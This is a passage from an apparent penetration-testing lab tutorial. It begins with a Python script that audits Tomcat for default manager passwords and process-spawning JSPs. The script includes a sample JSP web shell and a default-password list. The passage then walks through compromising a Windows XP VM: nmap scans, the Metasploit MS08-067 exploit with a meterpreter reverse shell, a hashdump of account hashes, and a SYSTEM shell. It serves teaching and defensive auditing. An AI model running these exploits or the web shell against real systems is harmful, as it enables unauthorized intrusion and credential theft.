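"""Audit a Tomcat install for the two weaknesses exploited above: a privileged
manager account with a default password, and JSP files that spawn processes.

This is an added example, not code from the original tutorial or from Tomcat.
It assumes the tomcat-users.xml layout Tomcat 5.5 ships with (<user> elements
with username/password/roles attributes) and takes JSP sources as text, so the
constructed samples below run offline; in practice read them from webapps/.
"""
import re
import xml.etree.ElementTree as ET

# Passwords the tutorial's tomcat_mgr_login run tried. Any of them bound to a
# privileged role is a finding whatever the local password policy says.
KNOWN_DEFAULT_PASSWORDS = {
    "", "admin", "manager", "role1", "root", "tomcat", "both", "j2deployer",
    "ovwebusr", "cxsdk", "ADMIN", "xampp", "s3cret", "OvW*busr1", "kdsxc",
    "owaspbwa",
}
PRIVILEGED_ROLES = {
    "manager", "admin", "manager-gui", "manager-script", "manager-jmx",
    "manager-status", "admin-gui", "admin-script",
}

# Constructed sample shaped like a stock Tomcat 5.5 tomcat-users.xml.
SAMPLE_TOMCAT_USERS = """<tomcat-users>
  <role rolename="tomcat"/>
  <role rolename="role1"/>
  <role rolename="manager"/>
  <role rolename="admin"/>
  <user username="tomcat" password="tomcat" roles="tomcat,manager,admin"/>
  <user username="role1" password="tomcat" roles="role1"/>
  <user username="both" password="tomcat" roles="tomcat,role1"/>
  <user username="deployer" password="X7kq2vPz9mLw4rQ8" roles="manager-script"/>
</tomcat-users>
"""

# Constructed JSP sources: the shape of cmd_shell.jsp above, a harmless page
# that only echoes a parameter, a page that runs a fixed command, and a
# non-JSP file that must be ignored.
SAMPLE_JSP_FILES = {
    "webapps/cmd/cmd_shell.jsp": (
        '<%@ page import="java.util.*,java.io.*"%>\n'
        '<% if (request.getParameter("cmd") != null) {\n'
        '  Process p = Runtime.getRuntime().exec(request.getParameter("cmd"));\n'
        '} %>'
    ),
    "webapps/shop/cart.jsp": '<% String id = request.getParameter("id"); %>\n<p><%= id %></p>',
    "webapps/ops/health.jsp": '<% Process p = Runtime.getRuntime().exec("uptime"); %>',
    "webapps/ops/README.txt": "Runtime.getRuntime().exec is mentioned here but this is not a JSP",
}

EXEC_RE = re.compile(
    r"Runtime\s*\.\s*getRuntime\s*\(\s*\)\s*\.\s*exec\s*\(|new\s+ProcessBuilder\s*\("
)
INPUT_RE = re.compile(r"request\s*\.\s*getParameter\s*\(")


def audit_tomcat_users(xml_text, min_len=12):
    """Return (username, privileged_roles, reasons) for weak privileged accounts."""
    findings = []
    for user in ET.fromstring(xml_text).iter("user"):
        # Tomcat accepts "username" or the older "name" attribute.
        name = user.get("username") or user.get("name") or ""
        password = user.get("password", "")
        roles = {r.strip() for r in user.get("roles", "").split(",") if r.strip()}
        privileged = sorted(roles & PRIVILEGED_ROLES)
        if not privileged:
            continue  # unprivileged accounts cannot deploy applications
        reasons = []
        if password in KNOWN_DEFAULT_PASSWORDS:
            reasons.append("well-known default password")
        if password == name:
            reasons.append("password equals username")
        if len(password) < min_len:
            reasons.append(f"shorter than {min_len} characters")
        if reasons:
            findings.append((name, privileged, reasons))
    return findings


def find_command_jsps(files):
    """Flag JSP sources that spawn processes.

    files maps path -> source text. Severity is "high" when the same file also
    reads a request parameter (input may reach the process call, as in the
    web shell above) and "medium" for any other process spawn; both deserve a
    look, since a JSP that feeds request input to a process is almost always
    a web shell.
    """
    hits = []
    for path, src in files.items():
        if not path.lower().endswith((".jsp", ".jspx")):
            continue
        if EXEC_RE.search(src) is None:
            continue
        hits.append((path, "high" if INPUT_RE.search(src) else "medium"))
    return sorted(hits)


if __name__ == "__main__":
    for name, roles, reasons in audit_tomcat_users(SAMPLE_TOMCAT_USERS):
        print(f"[users] {name} roles={roles}: {'; '.join(reasons)}")
    for path, severity in find_command_jsps(SAMPLE_JSP_FILES):
        print(f"[jsp] {severity}: {path}")
```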

Gathering Information – Windows XP Machine

We'll begin by running the same basic scan as before against our Windows XP VM at 192.168.56.103.

root@wizard32:~# nmap -p- 192.168.56.103
Starting Nmap 6.00 ( http://nmap.org ) at 2013-06-18 21:56 EEST
Nmap scan report for 192.168.56.103
Host is up (0.00070s latency).
Not shown: 65528 closed ports
PORT     STATE SERVICE
25/tcp   open  smtp
80/tcp   open  http
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
443/tcp  open  https
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
MAC Address: 08:00:27:4F:38:30 (Cadmus Computer Systems)
Nmap done: 1 IP address (1 host up) scanned in 31.09 seconds

Looking at the results, we can see several open ports. Let's focus on port 445. Using nmap once more, we'll add a couple of parameters to discover more about this specific port.

root@wizard32:~# nmap -A -Pn -T4 192.168.56.103 -p 445
Starting Nmap 6.00 ( http://nmap.org ) at 2013-06-18 21:55 EEST
Nmap scan report for 192.168.56.103
Host is up (0.00055s latency).
PORT    STATE SERVICE      VERSION
445/tcp open  microsoft-ds Microsoft Windows XP microsoft-ds
MAC Address: 08:00:27:4F:38:30 (Cadmus Computer Systems)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Microsoft Windows XP|2003
OS CPE: cpe:/o:microsoft:windows_xp cpe:/o:microsoft:windows_server_2003
OS details: Microsoft Windows XP SP2 or SP3, or Windows Server 2003
Network Distance: 1 hop
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_nbstat: NetBIOS name: WINDOWSX-C7B000, NetBIOS user: <unknown>, NetBIOS MAC: 08:00:27:4f:38:30 (Cadmus Computer Systems)
|_smbv2-enabled: Server doesn't support SMBv2 protocol
| smb-security-mode:
|   Account that was used for smb scripts: guest
|   User-level authentication
|   SMB Security: Challenge/response passwords supported
|_  Message signing disabled (dangerous, but default)
| smb-os-discovery:
|   OS: Windows XP (Windows 2000 LAN Manager)
|   Computer name: windowsx-c7b000
|   NetBIOS computer name: WINDOWSX-C7B000
|   Workgroup: WORKGROUP
|_  System time: 2013-06-18 04:36:59 UTC+3
TRACEROUTE
HOP RTT     ADDRESS
1   0.55 ms 192.168.56.103
OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 20.51 seconds

-A: Aggressive scan; enables several options at once, such as OS detection, version detection, script scanning and traceroute. Use with caution.


-T (0-5): Timing template; determines how aggressive (fast) the scan is.

-Pn: Skip host discovery; no ping is sent before scanning, and the host is treated as up.

-p: Only scan the specified ports.

Identify network services – Exploit Vulnerable Backdoors

Reviewing the nmap output closely, we can see that port 445/tcp runs an SMB server. We can identify the OS the SMB server runs on by typing:

msf > use auxiliary/scanner/smb/smb_version
msf auxiliary(smb_version) > set RHOSTS 192.168.56.103
RHOSTS => 192.168.56.103
msf auxiliary(smb_version) > run
[*] 192.168.56.103:445 is running Windows XP Service Pack 2 (language: English) (name:WINDOWSX-C7B000) (domain:WORKGROUP)
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

As we can see, the SMB server runs on Windows XP SP2. So, once more using Metasploit, we'll try to exploit it:

msf> use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set RHOST 192.168.56.103
RHOST => 192.168.56.103
set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(ms08_067_netapi) > set LHOST 192.168.56.1
LHOST => 192.168.56.1
msf exploit(ms08_067_netapi) > show options
Module options (exploit/windows/smb/ms08_067_netapi):
   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOST    192.168.56.103   yes       The target address
   RPORT    445              yes       Set the SMB service port
   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)
Payload options (windows/meterpreter/reverse_tcp):
   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique: seh, thread, process, none
   LHOST     192.168.56.1     yes       The listen address
   LPORT     4444             yes       The listen port
Exploit target:
   Id  Name
   --  ----
   0   Automatic Targeting
msf exploit(ms08_067_netapi) > exploit
[*] Started reverse handler on 192.168.56.1:4444
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP - Service Pack 2 - lang:English
[*] Selected Target: Windows XP SP2 English (AlwaysOn NX)
[*] Attempting to trigger the vulnerability...
[*] Sending stage (751104 bytes) to 192.168.56.103
[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.103:1079) at 2013-06-18 22:14:33 +0300
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer        : WINDOWSX-C7B000
OS              : Windows XP (Build 2600, Service Pack 2).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32
meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
HelpAssistant:1000:4b96c75b8d843a7ae69de05670f84236:d9178fd3b70a6bb945b5f1b67c6bf645:::
IUSR_WINDOWSX-C7B000:1004:7a68662f527f18a87dfe407d970d780e:199fc7a3f00b00d8da81a66e4507e55b:::
IWAM_WINDOWSX-C7B000:1005:27ffb5fdfeafa462d92e514086f08077:954f0124f93780ce8d43ffcda157a567:::
SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:603e6ae218ff6a77a3d7c9a519b93df7:::
windowsxp:1003:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
meterpreter > shell
Process 1908 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\WINDOWS\system32>systeminfo
systeminfo
Host Name:                 WINDOWSX-C7B000
OS Name:                   Microsoft Windows XP Professional
OS Version:                5.1.2600 Service Pack 2 Build 2600
OS Manufacturer:           Microsoft Corporation
OS Configuration:          Standalone Workstation
OS Build Type:             Uniprocessor Free
Registered Owner:          windowsxp
Registered Organization:
Product ID:                76487-640-8365391-23703
Original Install Date:     6/10/2013, 1:02:40 PM
System Up Time:            0 Days, 2 Hours, 4 Minutes, 1 Seconds
System Manufacturer:       innotek GmbH
System Model:              VirtualBox
System type:               X86-based PC
Processor(s):              1 Processor(s) Installed.
                           [01]: x86 Family 6 Model 58 Stepping 9 GenuineIntel ~2484 Mhz
BIOS Version:              VBOX   - 1
Windows Directory:         C:\WINDOWS
System Directory:          C:\WINDOWS\system32
Boot Device:               \Device\HarddiskVolume1
System Locale:             en-us;English (United States)
Input Locale:              en-us;English (United States)
Time Zone:                 (GMT+02:00) Athens, Beirut, Istanbul, Minsk
Total Physical Memory:     511 MB
Available Physical Memory: 370 MB
Virtual Memory: Max Size:  2,048 MB
Virtual Memory: Available: 2,009 MB
Virtual Memory: In Use:    39 MB
Page File Location(s):     C:\pagefile.sys
Domain:                    WORKGROUP
Logon Server:              N/A
Hotfix(s):                 1 Hotfix(s) Installed.
                           [01]: Q147222
NetWork Card(s):           1 NIC(s) Installed.
                           [01]: AMD PCNET Family PCI Ethernet Adapter
                                 Connection Name: Local Area Connection
                                 DHCP Enabled:    No
                                 IP address(es)
                                 [01]: 192.168.56.103

Conclusion

There are many ways to enumerate and exploit vulnerable web applications and services. This tutorial describes the basic steps for gathering important information and exploiting some of the best-known vulnerable services in a couple of ways. The safest approach is to try every step in a virtual environment before running any of the above examples against real servers, and to do so only with authorized access granted by the administrator.